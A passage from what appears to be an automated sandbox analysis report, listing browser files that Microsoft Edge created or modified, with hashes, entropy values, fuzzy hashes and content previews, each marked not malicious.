Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5fff3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF60031.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF600cd.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF612cf.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF612fe.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	50
Entropy (8bit):	3.9904355005135823
Encrypted:	false
SSDEEP:	3:0xXF/XctY5GUf+:0RFeUf+
MD5:	E144AFBFB9EE10479AE2A9437D3FC9CA
SHA1:	5AAAC173107C688C06944D746394C21535B0514B
SHA-256:	EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
SHA-512:	837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
Malicious:	false
Preview:	topTraffic_170540185939602997400506234197983529371

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.020265484668824
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXQoS/y:YWLSGTt1o9LuLgfGBPAzkVj/T8lAo+y
MD5:	DE0E6D3F7B1005BE7DD68E0D74164B75
SHA1:	3901B91D901B915716B5F587A38D0DCECBE54D68
SHA-256:	6BB0F0AF285DF8B96B4701144A0D43D26391FA2B05A1C8D0E0A1D2A30BCD74C2
SHA-512:	B4CAF550A06BEC4F7974CEFA6046E2855095953DF6B9FFAFC14CA4F04B171DD61592E1296CD6DDDDCDBCBCD4E0F2111BC3988D5C047EE5AA9933D712E77EE4EE
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732324387173889}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.3488360343066725
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ25AmIpozQ1:YQ3Kq9X0dMgAEiLIX
MD5:	916D4F5F8E2C8885224D1575807F6676
SHA1:	BDF182D48EB1C332D8438A30E19146EC1B5B1012
SHA-256:	35B72ABBB267230A52EB2FE73A32485FBF6DAB0E4DCB5A9F56A5B67FF476973E
SHA-512:	89FDE148CE52B52C8BDD8F321CFAD0CDCFF6F265D3D5C722B577BC8D70E7E6BAF4809C5A5D394FDA20FFC8D3DDAF5AB3BD84E11DC0C9933DABE037180EDE661D
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":5}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a4f53a64-38ff-4684-83fd-90008f0d85c9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	47186
Entropy (8bit):	6.094521770706816
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jretv7b3cGoup1Xl3jVzXr4r:b/Ps+wsI7yO9wf6Dxr2chu3VlXr4CRoR
MD5:	4C35B91F261359BF38EAB1C11D61634D
SHA1:	756DAF4D8F2C1EE2C26854FAA60E566DF21CAFD3
SHA-256:	DD985754D7B0160F92CD885BDEF6E839F61371A0D61CE92D082AA996ECFA8F21
SHA-512:	FA354B35A75080E3EF5F171588C6216697A2D765CB47CCF1E16459588442DB6DEC82FFDD3861E8184CC3176596B1554BBE347E70C5896BE9915656C65BB7A753
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\bf6d7936-ffa6-419f-b909-24a3bbd28cdd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	46321
Entropy (8bit):	6.093327811081409
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jre4lb3cGoup1Xl3jVzXr4Cj:b/Ps+wsI7yO9wf6Dxrrchu3VlXr4CRoI
MD5:	2D3174ECB00F257998FC1A848FBCB3FC
SHA1:	D50BBAEBC6FF7E1D831F7BA47C3E2E115D49A3DA
SHA-256:	DBA26D82FD5B2079DABB74A64B314D4D83A1548F6C24530138BEA2E2633A57F4
SHA-512:	A1A699D5B0C56A79EB728D09EA0737E0A3B5D4C876CB4AE4DBE3985A72F5D75B098C65A5E54CD17FEB09A96FAB4623F93F49AF6CEC6FB82FD1627590240D1F36
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c6072482-4c83-4c6a-81e3-55f6c214d619.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45567
Entropy (8bit):	6.092822593891334
Encrypted:	false
SSDEEP:	768:bDXzgWPsj/qlGJqIY8GB4x9sJLmuchDO6vP6OjE6Jygbh/pehcGoup1Xl3jVzXrT:b/Ps+wsI7yO9wf6DxAchu3VlXr4CRo4
MD5:	1408AA20D4B94A851B860FBF5E30489B
SHA1:	AE21B116772C6B0A82522B0DB2122C2F4BCFE2A0
SHA-256:	5530DC953A4346A246B3BC407337E55ABEFDDD4084EFAC36FCCE10514FBB67D9
SHA-512:	ABE0F62B933A4023127E6A7108001BEE65B4DA870BA53817ED356C3C9FE5E6D2F120554D3F9AF5D834D01BFA4E53CF6566C77C3DF0A24D998D17136DE97F3564
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d5b2caea-8f0f-487d-9a19-3a78f18d7efc.tmp

Download File

